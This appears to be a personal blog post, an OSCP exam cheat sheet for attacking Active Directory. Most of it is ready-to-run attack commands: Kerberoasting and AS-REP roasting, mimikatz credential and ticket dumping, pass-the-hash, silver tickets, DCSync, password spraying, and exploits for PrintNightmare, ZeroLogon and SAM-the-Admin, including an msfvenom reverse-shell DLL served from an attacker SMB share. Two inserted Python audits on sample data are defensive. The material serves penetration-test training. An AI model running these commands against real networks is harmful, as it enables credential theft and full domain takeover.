blog.mkiesel

häcks und so

26. Apr 2022 - Tips and Tricks for the AD Part of the OSCP Exam

OSCP - AD Cheat Sheet

Here are some tips and tricks that got me through the AD part of my OSCP exam. Please note that I do not plan on updating this list further down the road. OffSec probably updates their exam regularly, so do not rely on this page alone.

 Set DNS / hosts

Add the DC and all found clients into your /etc/hosts file.

192.168.99.10 dc1.domain.com dc1 domain.com
192.168.99.20 client1.domain.com client1

You could also add the DC to your /etc/resolv.conf, but that makes internet research slower: every lookup would first go to the DC and time out there before falling through to your normal resolver.

 Get a Shell or Credentials

 DNS Recon

Use fierce to find other hosts in the domain by brute-forcing subdomains against the DC's DNS.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

 User Recon

Use windapsearch to run LDAP queries. Anonymous binds are often allowed, so this frequently works without a password!

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute to enumerate users (it checks each name against the KDC, which is far less noisy than a login attempt).

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec to enumerate users (cme needs the protocol as first argument).

cme smb IP -u '' -p '' --users

# Get password policy
cme smb IP -u '' -p '' --pass-pol

Use username-anarchy to turn names found on company websites into candidate usernames.

username-anarchy -i INFILE > OUTFILE

Use cewl to crawl websites for words to pack into a wordlist, then expand it with hashcat rules.

cewl -d DEPTH -m MINIMUMLENGTH --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

 RPC Recon

# Could require credentials (-U '' -N = empty user, no password prompt)
rpcclient -U '' -N IP
    enumdomusers
    enumdomgroups
    # Check printer description for passwords
    enumprinters

impacket-rpcdump IP
# Check for PrintNightmare (print spooler exposed over RPC)
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

 SMB Recon

Check for anonymous/open shares.

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

 After Shell and/or Credentials

 Get a Shell

Some ways to get a shell with nothing more than a pair of credentials (impacket expects the target as DOMAIN/user:password@host, with a forward slash):

# Common
impacket-psexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-smbexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-wmiexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP

# WinRM (tcp/5985) needs to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD' IP

# Quite rare
impacket-atexec 'DOMAIN/user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN/user:PASSWORD@IP'

 Check for ASREPRoast

# Lists accounts whose AD attribute DONT_REQ_PREAUTH is set
# (add -request -format hashcat to also fetch the AS-REP hashes)
impacket-GetNPUsers 'DOMAIN/user:PASSWORD' -dc-ip DCIP

 Check for Kerberoast

# Lists user accounts with an SPN (add -request to also fetch the TGS hashes)
impacket-GetUserSPNs 'DOMAIN/user:PASSWORD' -dc-ip DCIP

Basic PowerShell script you can run from a shell inside the AD (it uses a DirectorySearcher against the PDC, so no extra modules are needed):

# Current domain; needed for the PDC name and the base DN below
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
# domain.com -> DC=domain,DC=com (the $( ) subexpression is required inside the string)
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# LDAP filter: every object that has a servicePrincipalName set
$Searcher.filter="serviceprincipalname=*"

$Result = $Searcher.Findall()

Write-Host "---------------------------"
Foreach($obj in $Result)
{
    ForEach($prop in $obj.Properties) {
        # uncomment to print all attributes
        #$prop
    }
    Write-Host "[SAM Account Name]"
    $obj.Properties.samaccountname
    Write-Host ""
    Write-Host "[User Principal Name]"
    $obj.Properties.userprincipalname
    Write-Host ""
    Write-Host "[Service Principal Name]"
    $obj.Properties.serviceprincipalname
    Write-Host "---------------------------"
}

To request the ticket with PowerShell:

add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'

To request the ticket with mimikatz:

.\mimikatz.exe
    kerberos::ask /target:SPN
    kerberos::list /export

Verify that the ticket is in memory with klist. Then use mimikatz to export the ticket. This does not require admin or SYSTEM privileges, because the ticket belongs to your own logon session.

.\mimikatz.exe
    # Verify the ticket exists
    kerberos::list
    # Export to current folder
    kerberos::list /export

Transfer the ticket to Kali and crack it with kerberoast.

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone https://github.com/nidem/kerberoast/     
cd kerberoast
pip3 install pyasn1

# Crack
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with Hashcat and kirbi2hashcat (mode 13100 is Kerberos 5 TGS-REP etype 23).

python kirbi2hashcat.py ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt
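The three checks above (User Recon descriptions, ASREPRoast, Kerberoast) and the TRUSTED_TO_AUTH_FOR_DELEGATION requirement of the SPN Impersonate section below all come down to a few LDAP attributes. The following audit is an added example, not code from the original post: it decodes userAccountControl from a constructed list of user entries (shaped like windapsearch output) and reports which accounts a defender should fix. The bit values are the documented ADS_USER_FLAG values; the sample accounts and passwords are made up.

```python
import re

# userAccountControl bits (ADS_USER_FLAG_ENUM)
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000               # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self)

# Words that hint at a credential stored in the description attribute
PASSWORD_HINT = re.compile(r"pass(word|wd)?|pwd|secret", re.IGNORECASE)

# Constructed sample entries (hypothetical accounts, not from any real domain)
SAMPLE_USERS = [
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.domain.com:1433"], "description": "Backup account"},
    {"sAMAccountName": "j.doe", "userAccountControl": 0x400200,
     "servicePrincipalName": [], "description": "Temp pwd: Summer2022!"},
    {"sAMAccountName": "old_user", "userAccountControl": 0x400202,  # disabled
     "servicePrincipalName": ["HTTP/old"], "description": ""},
    {"sAMAccountName": "DC1$", "userAccountControl": 0x82000,  # domain controller
     "servicePrincipalName": ["ldap/dc1.domain.com"], "description": ""},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1000200,
     "servicePrincipalName": ["HTTP/web01.domain.com"], "description": ""},
]


def audit(users):
    """Map sAMAccountName -> list of findings. Disabled accounts are skipped;
    computer accounts (trailing $) are not flagged for SPNs because their
    passwords are long and random, so a TGS for them is not crackable."""
    findings = {}
    for u in users:
        uac = int(u.get("userAccountControl", 0))
        if uac & ACCOUNTDISABLE:
            continue
        name = u["sAMAccountName"]
        issues = []
        if uac & DONT_REQ_PREAUTH:
            issues.append("asreproast: DONT_REQ_PREAUTH set")
        if u.get("servicePrincipalName") and not name.endswith("$"):
            issues.append("kerberoast: user account with SPN")
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            issues.append("delegation: TRUSTED_TO_AUTH_FOR_DELEGATION set")
        if PASSWORD_HINT.search(u.get("description") or ""):
            issues.append("description: possible credential in description")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_USERS).items():
        print(name, *("  - " + i for i in issues), sep="\n")
```

Accounts flagged for an SPN or DONT_REQ_PREAUTH need a long managed password or the flag removed; the same attributes are what GetNPUsers and GetUserSPNs read, so this is the view before the attacker gets it.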

 Check for the Big Exploits

These exploits only require valid domain credentials (any low-privileged domain user).

 PrintNightmare

CVE-2021-1675

Check with:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
cd $HOME/PATH/SOMEFOLDER
git clone https://github.com/cube0x0/impacket
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py -O ./impacket/CVE-2021-1675.py
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2
cd $HOME/PATH/SOMEFOLDER
source impacket/bin/activate
cd impacket

msfvenom -p windows/shell_reverse_tcp LHOST=LISTENINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
smbserver.py drop $(pwd) -smb2support

# Set up listener

# Terminal 1
python3 CVE-2021-1675.py domain.com/user:password@dcip '\\LISTENINGIP\drop\evil.dll'

 SAM the Admin

CVE-2021-42278
CVE-2021-42287

git clone https://github.com/WazeHell/sam-the-admin
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

python sam_the_admin.py DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios domain.com

 ZeroLogon

CVE-2020-1472

git clone https://github.com/risksense/zerologon/
cd zerologon

# DC NAME NOT FQDN!
python3 set_empty_pw.py DCNAME DCIP

 goldenPAC

CVE-2014-6324

impacket-goldenPac 'domain.com/user:password@dc'

 Tools

 Mimikatz

# Hashdump
.\mimikatz.exe
    # Elevate
    privilege::debug
    # Check for logged on passwords (requires admin/system)
    sekurlsa::logonpasswords
    # Dump password hashes via LSA (local accounts; on a DC also the domain accounts)
    lsadump::lsa /patch

# Overpass the Hash
.\mimikatz.exe
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
klist
net use \\DC
klist

# Pass the Ticket
.\mimikatz.exe
    # Elevate
    privilege::debug
    # Export the tickets
    # Creates .kirbi files in current folder
    sekurlsa::tickets /export

    # Load Ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket
.\mimikatz.exe
    # Elevate
    privilege::debug
    kerberos::purge
    # /rc4 is the NTLM hash of the service account
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rc4:SERVICEHASH /ptt

 Rubeus

# Harvest TGTs
.\Rubeus.exe harvest /interval:30

# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200  /usr/share/wordlists/rockyou.txt

 CrackMapExec

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success

 Bloodhound

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely 
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All

# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName loot.zip

 Other Techniques

 KrbRelayUp

Will get you a local SYSTEM shell if LDAP signing and LDAP channel binding are not enforced on the DC.

# https://github.com/Dec0ne/KrbRelayUp
# Do not pass cmd.exe or powershell.exe as the service command. Those spawn on the desktop, not in your shell
.\KrbRelayUp.exe relay -d domain.com -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d domain.com -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

 Pass the Hash

Works only on services that accept NTLM authentication.

# pth-winexe takes the hash as LMHASH:NTHASH in the password position
pth-winexe -U 'DOMAIN/USER%LMHASH:NTHASH' //IP cmd
evil-winrm -i IP -u USERNAME -H NTHASH

 Dump local SAM and Crack Hashes

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

# samdump2 takes the SYSTEM hive first, then the SAM hive
samdump2 system.out sam.out -o hashes.txt

hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

 Dump the NTDS

secretsdump.py -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history

 DC Sync Attack

Needs the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object (shown as GetChangesAll in BloodHound).

secretsdump.py DOMAIN/USER@DCIP
secretsdump.py DOMAIN/USER@DCIP -just-dc-user USERTOGETHASH
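Which principals hold the replication rights named above is exactly what a defender should review before an attacker does. The following audit is an added example, not code from the original post: it walks a constructed list of ACEs shaped like a simplified export of the domain object's ACL and reports non-default principals that can replicate secrets. The two control-access-right GUIDs are the documented ones; the expected-principal allowlist and the ACEs themselves are assumptions made up for this example.

```python
# Control-access-right GUIDs of the replication extended rights (MS-ADTS)
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dca2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dca2"
# An ExtendedRight ACE with an all-zero ObjectType covers every extended right
ANY_RIGHT = "00000000-0000-0000-0000-000000000000"
NEEDED = {GET_CHANGES, GET_CHANGES_ALL}

# Principals that hold these rights by default (assumption for this example)
EXPECTED = {"DOMAIN\\Domain Controllers", "DOMAIN\\Enterprise Domain Controllers",
            "BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM",
            "DOMAIN\\Domain Admins", "DOMAIN\\Enterprise Admins"}

# Constructed ACEs: (IdentityReference, AccessControlType, ActiveDirectoryRights, ObjectType)
SAMPLE_ACES = [
    ("DOMAIN\\Domain Controllers", "Allow", "ExtendedRight", GET_CHANGES),
    ("DOMAIN\\Domain Controllers", "Allow", "ExtendedRight", GET_CHANGES_ALL),
    ("BUILTIN\\Administrators", "Allow", "ExtendedRight", GET_CHANGES_ALL),
    ("DOMAIN\\svc_sync", "Allow", "ExtendedRight", GET_CHANGES),      # e.g. a sync tool
    ("DOMAIN\\svc_sync", "Allow", "ExtendedRight", GET_CHANGES_ALL),
    ("DOMAIN\\helpdesk", "Allow", "ExtendedRight", GET_CHANGES),      # only one of the two
    ("DOMAIN\\svc_backup", "Allow", "GenericAll", ANY_RIGHT),         # implies all rights
    ("DOMAIN\\contractor", "Allow", "ExtendedRight", ANY_RIGHT),
    ("DOMAIN\\contractor", "Deny", "ExtendedRight", GET_CHANGES_ALL), # Deny wins
]


def granted_rights(rights, guid):
    """Replication rights an ACE conveys: GenericAll or a blanket
    ExtendedRight grant both, otherwise only the named right."""
    if rights == "GenericAll" or (rights == "ExtendedRight" and guid == ANY_RIGHT):
        return set(NEEDED)
    return {guid} & NEEDED if rights == "ExtendedRight" else set()


def dcsync_capable(aces, expected=EXPECTED):
    """Return {principal: rights} for principals outside the allowlist that end
    up with both Get-Changes and Get-Changes-All after Deny ACEs are applied."""
    allowed, denied = {}, {}
    for who, kind, rights, guid in aces:
        if who in expected:
            continue
        bucket = allowed if kind == "Allow" else denied
        bucket.setdefault(who, set()).update(granted_rights(rights, guid))
    effective = {who: r - denied.get(who, set()) for who, r in allowed.items()}
    return {who: r for who, r in effective.items() if NEEDED <= r}


if __name__ == "__main__":
    for who in sorted(dcsync_capable(SAMPLE_ACES)):
        print("DCSync-capable:", who)
```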

 SPN Impersonate

Needs TRUSTED_TO_AUTH_FOR_DELEGATION on the owned account (constrained delegation with protocol transition).

# Kerberos tolerates only a few minutes of clock skew, so we need the same time as the DC
# Stop getting time from the hypervisor
sudo service virtualbox-guest-utils stop
# Update time from the DC
sudo ntpdate DCIP

getST.py -dc-ip DCIP -spn SPN -hashes LMHASH:NTHASH -impersonate administrator DOM/USER
# getST.py writes <impersonated user>.ccache into the current folder
export KRB5CCNAME=administrator.ccache

# Use the DC hostname (as in the SPN), not its IP, so Kerberos auth is used
impacket-psexec -k DOMAIN/Administrator@DC -no-pass

# Revert NTP to VBox
sudo service virtualbox-guest-utils start

 Show LAPS Passwords

If an owned user is either LAPS admin or just a LAPS reader, the ms-MCS-AdmPwd attribute of the computer objects is readable over plain LDAP:

ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -H ldap://DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd